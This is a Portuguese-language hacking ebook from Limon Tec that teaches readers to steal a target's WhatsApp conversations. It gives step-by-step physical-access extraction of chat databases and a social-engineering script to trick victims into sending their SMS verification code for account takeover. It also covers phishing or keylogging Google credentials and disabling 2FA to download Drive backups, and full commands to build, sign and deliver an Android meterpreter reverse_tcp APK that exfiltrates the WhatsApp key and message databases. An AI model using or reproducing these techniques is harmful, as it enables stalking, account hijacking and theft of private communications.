https://www.limontec.com/2020/01/ebook-manual-hacker-whatsapp-edicao-2020.html
Apresentação
Olá caro leitor, neste ebook você aprenderá técnicas utilizadas por hackers que
hackeiam usuários do popular aplicativo de mensagens WhatsApp. As técnicas
apresentadas aqui são facilmente reproduzíveis e não explora qualquer vulnerabilidade no
aplicativo, pois foca nos leitores que não possuem conhecimento técnico em informática e
segurança, mas lembre-se que os envolvidos na produção e distribuição deste ebook não
se responsabilizam pelos seus atos, ou seja, você assume toda a responsabilidade pela
reprodução que fazer das técnicas apresentadas neste ebook, portanto aconselho a realizar
os procedimentos em ambiente controlado e autorizado.
Este ebook foi produzido em parceria com a equipe Limon Tec que disponibilizará tutoriais
das técnicas apresentadas aqui em formato de vídeo, antes ou depois de cada explicação
do método você verá um link para um vídeo no YouTube contendo a demonstração do
método.
Sem root
A técnica apresentada abaixo funciona nas versões do Android inferior a 7.0
(Nougat) e foi testada com sucesso em um Samsung Galaxy J mini rodando Android 5.1.1 e
um Samsung Galaxy J2 Prime rodando Android 6.0.1, realizando o procedimento a partir de
um computador rodando Windows 10.
Essa técnica funciona em computadores Linux e Mac OS X, só que como a maioria
do público leigo interessado usam Windows, irei focar neste sistema. Portanto caso use
Linux, o procedimento é o mesmo, só muda a forma de instalação das ferramentas, que em
sua maioria das vezes é mais simples e o tipo de script que deve executar é diferente, não
se preocupe que informarei quando necessário e caso use Mac siga os passos para Linux.
Caso use Linux o script é o “WhatsAppKeyDBExtract.sh”, pode ser que seja necessário dar
permissões para execução do script “chmod +x WhatsAppKeyDBExtract.sh”. No Windows,
se você tiver problemas com o arquivo “.bat”, clique com o botão direito sobre o arquivo de
mesmo nome só que com final “.ps1” e selecione “Executar com PowerShell”, no terminal
aperte “y” na primeira execução.
Bom, execute o script aguarde aparecer no terminal a mensagem “daemon started
successfully”. Em seguida plugue seu smartphone se ainda não tiver plugado, deve então
aparecer na tela do seu smartphone “Permitir depur. USB?”, apenas clique em “Ok” que
logo em seguida o script irá automaticamente realizar os procedimentos necessários para
extrair as conversas. O procedimento consiste em baixar uma versão antiga do WhatsApp,
depois salvar a versão que está no aparelho e instalar a versão antiga baixada, depois disso
no aparelho aparecerá uma mensagem “Backup completo” solicitando para você inserir uma
senha, coloque então uma senha fácil, em alguns aparelhos pode ser que não necessite
inserir uma senha, a senha é solicitada quando o aparelho possui criptografia ativada, em
seguida apenas clique em “FAZER BACKUP DE MEUS DADOS”. Feito isso aguarde a tela
de backup sumir do celular e aparecer rapidamente “O backup foi concluído”. No terminal,
no computador, será solicitado então que você insira a senha que você colocou no
smartphone, caso não inseriu senha apenas dê enter. Dado enter, agora é só aguardar o
processo terminar, o script vai extrair
as conversas e depois restaurar a
versão do WhatsApp que estava
sendo usada no aparelho, note que no
celular o WhatsApp estará intacto
após a realização do procedimento, ou
seja, não precisa ter medo pois tudo
volta ao normal caso o processo não
seja interrompido inesperadamente.
Quando o procedimento terminar, no
terminal irá aparecer “Operation
complete” e por fim “Pressione qualquer tecla para continuar…”, dê enter e o terminal será
fechado. Navegue então para a pasta onde se encontra o script e entre na pasta
“extracted”, nela você vai visualizar os arquivos “msgstore.db” (histórico de conversas já
descriptografado) e “wa.db” (ele serve para converter os números dos telefones com o qual
você conversou em nome de contatos que estavam no aparelho), estes dois arquivos serão
usados a partir de agora para visualizar as conversas que estavam no aparelho. Você já
pode desconectar o aparelho do computador. Note que o arquivo “whatsapp.cryptkey”
contém a key mas nosso “msgstore.db” já está descriptografado, portanto não será
necessário usar a key para descriptografar.
Lembra que você baixou no seu Windows o “Visualizador CHAT”, procure e extraia o
arquivo “WhatsApp.Viewer.zip” e em seguida execute o arquivo “WhatsApp Viewer.exe”. Na
janela que abrir, aperte “File” e em seguida “Open…”. No primeiro campo “File” aponte para
o arquivo “msgstore.db” e no campo “wa.db (optional)” aponte para o arquivo “wa.db”,
ambos presente na pasta “extracted” da ferramenta “WhatsApp-Key-DB-Extractor”.
Com root
A técnica que será apresentada visa extrair a chave (key) para descriptografar
arquivos “msgstore.db.crypt12”, o processo em aparelhos que possui root é muito simples,
com acesso físico ao aparelho você precisa primeiramente baixar e instalar algum aplicativo
explorador de arquivo com suporte a root. Existem diversos no Google Play, por experiência
recomendamos o R oot Browser Classic baixe, instale-o e dê permissões de root assim que
solicitado. Depois de permitir o acesso de super usuário, navegue pelo caminho
“/data/data/com.whatsapp/files”, dentro da pasta “files” você vai encontrar o arquivo “key”.
Copie então o arquivo “key” para sua pasta “Downloads” para facilitar seu compartilhamento
mais tarde. A imagem abaixo ilustra o processo:
Como sabem a “key” serve para descriptografar o arquivo “msgstore.db.crypt12” que fica no
caminho da memória interna ou externa “.../WhatsApp/Databases/” quando o backup local
do WhatsApp está ativado, mas já que você está com acesso ao root, você pode extrair o
arquivo “msgstore.db” já descriptografado, o que lhe poupa muito tempo! No caminho
“/data/data/com.whatsapp/Databases/” você encontra o arquivo “msgstore.db”, basta então
copiar ele para a pasta “Downloads”, aproveite e pegue também o arquivo “wa.db” ele serve
para converter os números dos
contatos em nomes. Com os arquivos
na pasta download você consegue
enviar eles para seu computador e
consegue visualizar o conteúdo sem
fornecer a chave para
descriptografar, para isso você pode
usar o programa citado no capítulo
anterior o “WhatsApp Viewer.exe”.
Você deve estar se perguntando: “Se
já extraímos o arquivo descriptografado porque necessitaríamos da key?”. Bom, ela pode
ser útil para descriptografar o arquivo “msgstore.db.crypt12” que é armazenado
automaticamente na conta no Google Drive, cujo backup é feito periodicamente, no próximo
capítulo você aprenderá a extrair o backup da conta no GDrive.
Hackeando remotamente
Para realizar com sucesso o procedimento, primeiramente é necessário obter o
arquivo “msgstore.db.crypt12” do aparelho do alvo. Para isso você pode infectar o aparelho
do alvo utilizando de engenharia social fazendo o alvo instalar determinado aplicativo
malicioso sem perceber, para então poder fazer o download do arquivo que contém as
conversas criptografadas. Ou pode utilizar de técnicas como phishing (criação de página
falsa) para que o alvo forneça seu email e senha de sua conta Google ou mesmo infectar o
computador do alvo com um keylogger afim de capturar tudo que ele digita até o momento
em que ele realiza login em sua conta Google, para que depois seja feito o download do
arquivo “msgstore.db.crypt12” armazenado em sua conta no Google Drive.
Sem root
Para a opção sem root, a técnica utilizada consiste em ativar o número do alvo em
outro aparelho que possua root ou Android inferior a versão 7, o segundo aparelho deve
possuir root pois assim podemos facilmente extrair a key, se não você pode optar por ativar
o número em um aparelho compatível com a técnica ensinada no capítulo “Hackeando com
acesso físico - sem root” ou mesmo utilizar um emulador de android com root habilitado, em
seu computador. O objetivo principal então é capturar do smartphone do alvo e em seguida
carregar, em um Android que você controle, o arquivo “msgstore.db.crypt12” no caminho
padrão que fica guardado as conversas
“.../WhatsApp/Databases/” e então gerar a
mesma chave que criptografou para
descriptografar este arquivo. O processo de
gerar a chave consiste basicamente em solicitar
a criação de uma conta no WhatsApp, será
então enviado um SMS, ou feito uma ligação,
para o número do alvo. Neste momento você
precisa ser capaz de capturar o código fornecido
e inserir no seu aparelho para gerar a chave e
descriptografar as conversas. Para capturar o
código, existem diversas técnicas avançadas,
algumas já foram até protagonizadas em séries
como Mr Robot, mas para simplificar usar a boa
e velha engenharia social ainda é muito útil na
maioria dos casos.
Por exemplo para esta técnica podemos entrar
em contato via WhatsApp com o nosso alvo
solicitando ajuda: “Olá, preciso que me ajude,
meu WhatsApp deu problema, não to conseguindo enviar mensagem para outras pessoas,
se chegar um sms aí com um código me envie o código para que eu possa solucionar meu
problema, é muito ruim ficar sem poder contactar meus amigos”, muitos ainda caem em
algumas variantes deste antigo golpe. Note que o alvo ficará sem acesso ao WhatsApp no
momento que você conseguir ativar o código, ele então vai visualizar uma mensagem como
a mensagem da imagem acima. Então é muito provável que logo em seguida o alvo
perceberá que foi vítima mas você já terá o backup descriptografado em mãos, o que resta
para o alvo é apenas restaurar a conta. Neste momento alguns golpistas costumam
cadastrar um PIN a conta, para ganhar tempo e trancar o alvo do lado de fora
impossibilitando o alvo de restaurar a conta. O alvo somente conseguirá restaurar a conta
sem ser solicitado PIN após 7 dias do ocorrido.
Antes de realizar a descriptografia do arquivo, precisamos obter o arquivo. Para o
método envolvendo “sem root” vamos extrair o arquivo criptografado de uma conta no
Google Drive. Como mencionado anteriormente, existem diversas técnicas exploradas por
hackers para se ter acesso ao email do alvo. Você pode utilizar o velho e bom phishing,
mas note que pode ser que o sistema de segurança do Google detecta a atividade suspeita,
por isso é bom conhecer o alvo e manter um padrão de acesso… mesma localidade e
dispositivos que ele utiliza geralmente para realizar login, caso contrário o alarme vai soar e
o alvo será notificado de diversas formas para bloquear o acesso… caso não tenha como
manter o padrão de acesso do alvo, você pode optar por realizar o login, após capturar as
credenciais, em um horário que você tem certeza que o alvo não cheque as notificações,
caso o alvo possua autenticação em dois fatores o plano não funcionará… terá que planejar
algo diferente e desativar o 2FA para posteriormente poder extrair o arquivo.
Antes de prosseguir é necessário que possua o python 3 instalado em seu sistema, caso
use Windows confira este vídeo: http://bit.ly/358oKvu . Para os usuários de Mac e Linux, no
site oficial python.org vocês encontram o procedimento de instalação.
Recomendo assistir ao vídeo antes da leitura, pois está bem detalhado. Em parênteses
você encontra o tempo do vídeo em que o assunto é apresentado.
ttps://github.com/limontec/whapa
Link para versão do script utilizada no vídeo: h
Desabilite o 2FA caso esteja ativado em sua conta Google. Para isso visite a página:
myaccount.google.com/security e desative a autenticação em dois fatores.
Na aba “Whagodri” selecione “info about account” e clique no ícone verde. A ferramenta
tentará conectar-se a sua conta Google. Caso receba algum erro relacionado a conexão,
feche a janela e abra novamente, mas antes acesse o seguinte site:
accounts.google.com/DisplayUnlockCaptcha e autorize o acesso, após autorizar tente rodar
a ferramenta novamente. Se error persistir, confira se digitou corretamente o email e senha
no arquivo “settings.cfg” bem como o número associado ao arquivo de backup. Se as
informações de backup forem listadas sem problema no terminal, então você já pode
realizar o download dos dados, para isso em “Download” marque o que deseja baixar…
tudo (all) ou apenas o msgstore.db.crypt12 (databases) e depois clique no ícone verde.
Note que o download pode demorar dependendo da quantidade de dados selecionados
para baixar. Os dados baixados estarão presente dentro da pasta “whapa-master” do script
separado em subpastas.
Abaixo você confere como descriptografar o arquivo msgstore.db.crypt12 extraído de sua
conta no Google Drive, foi utilizado em emulador Android com root habilitado, no Limon Tec
você confere um artigo sobre como instalar um emulador Android em seu Windows e
habilitar root. Note que você pode optar por realizar o procedimento em um Android sem
root rodando uma versão inferior do Android 7.0 para extrair o arquivo msgstore.db
descriptografado.
Com root
A técnica que será apresentada abaixo embora seja um ataque remoto, todo a
conexão será feita pela rede local, ou seja, o alvo deve estar conectado na mesma rede wifi
que você. Você ainda pode adaptar o método para alcançar o alvo quando ele não estiver
na mesma rede local, utilizando ferramentas como no-ip ou ngrok. Continuando,
basicamente o que faremos é criar um apk genérico e enviaremos para o alvo instalar
aplicando engenharia social. É possível injetar o código malicioso que permite a conexão
remota em alguns aplicativos populares, só que muitas ferramentas que oferecem isso não
conseguem injetar o código nos apps que são lançados atualmente, portanto é necessário
conhecimento técnico para injetar o código manualmente o que não é o foco deste ebook.
Com o WSL ativo, acesse a loja de aplicativos da Microsoft e procure por “Kali
Linux”, existe também outras opções de sistemas como “Ubuntu” e “Debian”. Após instalar o
Kali Linux adicione o diretório dele presente no Windows nas exceções do seu antivírus ou
Windows Defender, isso é necessário pois pode ser que seu antivírus bloqueia o metasploit
durante a instalação já que o mesmo vem com códigos maliciosos prontos para serem
utilizados por você. No Windows Defender basta ir em "Proteção contra vírus e ameaças >
Configurações de proteção contra vírus e ameaças > Adicionar ou remover exclusões" e
apontar para o caminho
“C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....” .
Agora abra o Kali e execute os comandos: "sudo apt-get update", “sudo apt-get
upgrade” e “sudo apt-get install metasploit-framework”. Após o último comando, o metasploit
já estará instalado. Como realizaremos o ataque em rede local ou seja pelo WiFi, no
terminal do Kali você pode consultar seu ip local com o comando “ifconfig”, será listado
então em “eth0” ou “wlan0” seu ip local, geralmente algo parecido com “192.168…” ou
“10.0.0…”. Em seguida crie o app malicioso com o comando: "msfvenom -p
android/meterpreter/reverse_tcp LHOST=seu_ip LPORT=4444 R > nome_qualquer.apk"
O apk gerado ainda não funciona em muitas versões do Android, pois é necessário
criar uma assinatura para ele. Instale então a ferramenta keytool, para gerar uma
assinatura, com o comando: "sudo apt-get install openjdk-8-jdk". Crie a assinatura com o
comando: "keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg
RSA -keysize 2048 -validity 10000" . Você pode preencher as informações solicitadas
aleatoriamente.
Com a assinatura em mãos, assine o apk com ela utilizando o seguinte comando:
"jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
my-release-key.keystore nome_do_apk.apk alias_name". Ainda é preciso de outra
ferramenta para alinhar o apk, baixe e instale o zipalign com o comando: "sudo apt-get
install zipalign" . Em seguida alinhe o apk com o comando: "zipalign -v 4 nomeapk.apk
novonome.apk".
O apk agora está pronto, pelo Windows você encontrar ele no caminho
“C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....\LocalState\rootfs\ho
me\seu_user_linux\” , com certeza alguns antivírus irão relatar ele como vírus, é possível
ofuscar o código malicioso presente no apk mas este método é
avançado o que não é o foco deste ebook, mas no site
limontec.com você encontra materiais sobre o tema de como
inserir o código malicioso em apps originais como Instagram.
Bom, envie o apk para o aparelho alvo… se instalar perceberá
que ele não abre nada apenas cria um app chamado
“MainActivity”, sempre que este app é aberto ele tenta se
conectar a máquina que está esperando conexão dele, portanto
agora em seu Kali vamos configurar a escuta. Digite o
comando “msfconsole” para iniciar o console do metasploit.
Então execute os comandos:
● "use exploit/multi/handler"
● "set payload android/meterpreter/reverse_tcp"
● "set LHOST seu_ip_local"
● “exploit”
● /data/data/com.whatsapp/files/key
● /data/data/com.whatsapp/databases/wa.db
● /data/data/com.whatsapp/databases/msgstore.db
Para isso crie uma pasta no caminho da pasta padrão de Downloads do aparelho,
geralmente fica no cartão de memória no caminho “/sdcard/Download” , crie a pasta com o
comando “mkdir wppdata” estando dentro do diretório “Download”. Após criado a pasta
copie os arquivos do WhatsApp citados anteriormente para ela com os comandos abaixo:
● cp /data/data/com.whatsapp/files/key /sdcard/Download/wppdata
● cp /data/data/com.whatsapp/databases/wa.db /sdcard/Download/wppdata
● cp /data/data/com.whatsapp/databases/msgstore.db /sdcard/Download/wppdata
Isso é necessário pois não é possível fazer download direto de um diretório interno do
sistema. Saia da shell apertando “ctrl + c” seguido de “y”. Você verá novamente o
“meterpreter >” então use o comando abaixo para realizar download dos arquivos presentes
na pasta que criamos “wppdata”:
Lembre que o caminho antes de “/Download/wppdata” pode ser diferente no seu aparelho
alvo. Feito o download, pelo Windows acesse o caminho
“C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....\LocalState\rootfs\ho
me\seu_user_linux\” para encontrar os arquivos baixados. Agora use alguma ferramenta
como WhatsApp-Viewer ou Whapa para visualizar as conversas presente no arquivo
msgstore.db já descriptografado. Como você também capturou a key e possui o aplicativo
malicioso no aparelho, para ver conversas mais recentes basta se conectar remotamente ao
aparelho novamente pelo procedimento citado acima e baixar o arquivo
msgstore.db.crypt12 presente no caminho “.../WhatsApp/Databases/” não protegido pelo
sistema e então usar a key para descriptografar o arquivo!
Agradecimento
Obrigado por adquirir este ebook e pedimos desculpa caso não tenhamos atendido
suas expectativas, sinta-se à vontade para dar feedback ou nos corrigir pelas formas de
ttps://www.limontec.com/p/contato.html.
contatos presente em h
Pedimos por favor que evite compartilhar publicamente este ebook com terceiros, embora
reconhecemos o quão belo e inspirador pode ser a informação livre e gratuita, a única forma
que encontramos de monetizar o tempo da equipe Limon Tec para trazer mais informações
gratuitas no site foi através da publicação deste ebook, a equipe Limon Tec agradece sua
compreensão.
Links úteis
Curso Hacker Grátis: https://www.limontec.com/2015/12/curso-hacker-wi-fi-limon-tec.html
Cursos Programação Grátis: h ttps://www.limontec.com/2017/01/projeto-ltcode.html
ttps://youtube.com/limontec
Canal no YouTube: h
ttps://t.me/limontec
Canal no Telegram: h